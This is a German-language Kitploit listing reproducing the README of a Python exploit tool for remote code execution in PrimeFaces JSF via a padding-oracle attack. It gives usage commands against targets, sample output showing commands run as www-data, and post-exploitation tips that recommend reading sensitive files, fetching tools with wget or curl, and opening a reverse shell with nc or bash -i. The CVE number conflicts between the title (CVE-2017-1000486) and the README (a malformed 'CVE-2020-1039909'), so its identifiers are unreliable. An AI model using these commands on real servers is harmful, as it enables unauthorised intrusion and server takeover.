Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-1000486 — Python-basierter Exploit für CVE-2020-1039909, eine Remote-Codeausführungs-Schwachstelle in Primefaces JSF. Führt beliebige Befehle über einen Padding-Oracle-Angriff aus, mit Optionen für Proxy, Cookies und POC-Modus. | Kitploit
Tools/GitHubGitHub/byt3l0rd/cve-2017-1000486
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationKryptographiePenetrationstestsRed Teaming
GitHubbyt3l0rd/cve-2017-1000486

CVE-2017-1000486

Python-basierter Exploit für CVE-2020-1039909, eine Remote-Codeausführungs-Schwachstelle in Primefaces JSF. Führt beliebige Befehle über einen Padding-Oracle-Angriff aus, mit Optionen für Proxy, Cookies und POC-Modus.

Repository anzeigen
vor 11h 18mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

README - CVE-2020-1039909 Primefaces Remote Code Execution

============================================================

ÜBER DIE SCHWACHSTELLE

CVE-2020-1039909 ist eine Schwachstelle zur Remote-Codeausführung (RCE) im Primefaces-JSF-Framework. Der Fehler ermöglicht es einem Angreifer, über einen Padding-Oracle-Angriff beliebige Befehle auf dem Server auszuführen, was auf die Verwendung schwacher Verschlüsselung und eines Standardpassworts zurückzuführen ist.

Betroffene Versionen:

  • Primefaces vor 5.2.21
  • Primefaces 5.3.x vor 5.3.8
  • Primefaces 6.x vor 6.0

Auswirkungen:

  • Remote-Codeausführung (RCE)
  • Vollständige Kompromittierung des Servers
  • Zugriff auf das Betriebssystem
  • Mögliche Installation von Backdoors

============================================================

VORAUSSETZUNGEN

  • Ziel läuft mit verwundbarem Primefaces
  • Python 3.6+
  • Bibliotheken: requests, pycryptodome, paddingoracle

Installation der Abhängigkeiten:

pip install requests pycryptodome paddingoracle

============================================================

VERFÜGBARE BEFEHLE

Grundlegende Parameter:

target URL des Ziels (z. B. http://target.com) -pw, --password Primefaces-Passwort (Standard: primefaces) -pt, --path Pfad zu dynamiccontent.properties (Standard: /javax.faces.resource/dynamiccontent.properties.xhtml) -c, --cmd Auszuführender Befehl (Standard: whoami) -poc, --poc Test-Payload verwenden (prüft nur die Schwachstelle) -px, --proxy Proxy konfigurieren (z. B. http://127.0.0.1:8080) -ck, --cookie Cookie konfigurieren -o, --oracle Padding-Oracle-Angriff aktivieren (1 = aktiviert, 0 = deaktiviert) (STANDARD: 0) (LANGSAM) -pl, --payload Verschlüsselte EL-Payload (zur Verwendung mit Padding Oracle)

============================================================

ANWENDUNGSBEISPIELE

  1. Grundlegenden Befehl ausführen (whoami)

python3 exploit.py

http://target.com
  1. Spezifischen Befehl ausführen

python3 exploit.py http://target.com -c "id"

  1. Prüfen, ob das Ziel verwundbar ist (POC-Modus)

python3 exploit.py http://target.com --poc

  1. Proxy verwenden (Burp Suite)

python3 exploit.py http://target.com -px http://127.0.0.1:8080

  1. Mit Cookie verwenden

python3 exploit.py http://target.com -ck "JSESSIONID=xxx"

  1. Padding Oracle verwenden (langsamer, aber effektiver)

python3 exploit.py http://target.com -o 1 -c "whoami"

  1. Zuvor generierte Payload verwenden

python3 exploit.py http://target.com -pl "payload_criptografado"

============================================================

BEISPIEL FÜR DIE AUSGABE

$ python3 exploit.py http://target.com -c "id"

[] Generated Encrypted Payload: xyz123... [] Attempting to execute: id

POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 ...

HTTP/1.1 200 OK ...

[+] Exploit Result:

HTTP/1.1 200 OK ...

uid=33(www-data) gid=33(www-data) groups=33(www-data)

============================================================

POC-MODUS (SCHWACHSTELLENTEST)

Der POC-Modus prüft nur, ob das Ziel verwundbar ist, ohne gefährliche Befehle auszuführen:

python3 exploit.py http://target.com --poc

Erwartete Ausgabe, wenn verwundbar:

[+] BANG!!! :D - Target IS VULNERABLE!!!

Ausgabe, wenn nicht verwundbar:

[-] Target Probably NOT VULNERABLE :-(

============================================================

PADDING ORACLE (LANGSAMER MODUS)

Wenn der Standardangriff nicht funktioniert (leerer Response-Body), versuchen Sie den Padding-Oracle-Modus. Dieser Modus ist langsamer, aber effektiver:

python3 exploit.py http://target.com -o 1 -c "whoami"

============================================================

PROXY UND DEBUG

Zum Analysieren der Anfragen mit Burp Suite:

python3 exploit.py http://target.com -px http://127.0.0.1:8080

============================================================

HÄUFIGE FEHLER UND LÖSUNGEN

"Response body empty... Target might not be vulnerable" Versuchen Sie den Padding-Oracle-Modus: -o 1

"Target Probably NOT VULNERABLE" Das Ziel ist möglicherweise gepatcht oder verwendet nicht das Standardpasswort

"Connection refused" Stellen Sie sicher, dass das Ziel erreichbar ist

"SSL Error" Verwenden Sie http statt https oder ignorieren Sie Zertifikate

============================================================

TIPPS ZUR AUSNUTZUNG

  • Testen Sie mehrere Befehle, um das System zu erkunden
  • Verwenden Sie whoami, um den aktuellen Benutzer zu identifizieren
  • Verwenden Sie id, um Berechtigungen zu sehen
  • Verwenden Sie ls, um Dateien aufzulisten
  • Verwenden Sie cat, um sensible Dateien zu lesen
  • Verwenden Sie wget oder curl, um zusätzliche Tools herunterzuladen
  • Verwenden Sie nc oder bash -i, um eine Reverse-Shell zu erhalten

============================================================

HAFTUNGSAUSSCHLUSS

Diese Software wird zu Bildungs- und Testzwecken bereitgestellt. Der Autor übernimmt keine Verantwortung für Schäden, Verluste oder Konsequenzen, die aus der missbräuchlichen Verwendung dieses Tools entstehen.

Der Benutzer ist allein für seine Handlungen verantwortlich. Die Verwendung dieses Exploits auf Systemen ohne Autorisierung ist illegal und kann zu zivil- und strafrechtlichen Sanktionen führen.

Verwenden Sie es verantwortungsvoll und ethisch. Wissen ist zum Teilen da, aber Weisheit liegt darin zu wissen, wie und wann man es einsetzt.

============================================================

MITIGATION (FÜR ADMINISTRATOREN)

  1. Aktualisieren Sie Primefaces auf die neueste Version
  2. Ändern Sie das Standardpasswort von Primefaces
  3. Verwenden Sie HTTPS, um die Kommunikation zu verschlüsseln
  4. Implementieren Sie eine WAF, um bösartige Payloads zu blockieren
  5. Deaktivieren Sie die Funktion dynamiccontent.properties, wenn sie nicht benötigt wird

============================================================

REFERENZEN

  • CVE-2020-1039909: https://nvd.nist.gov/vuln/detail/CVE-2020-1039909
  • Primefaces Security Advisory
  • Padding Oracle Attack (CVE-2017-1000486)

============================================================

Developed by byt3l0rd

Tool herunterladen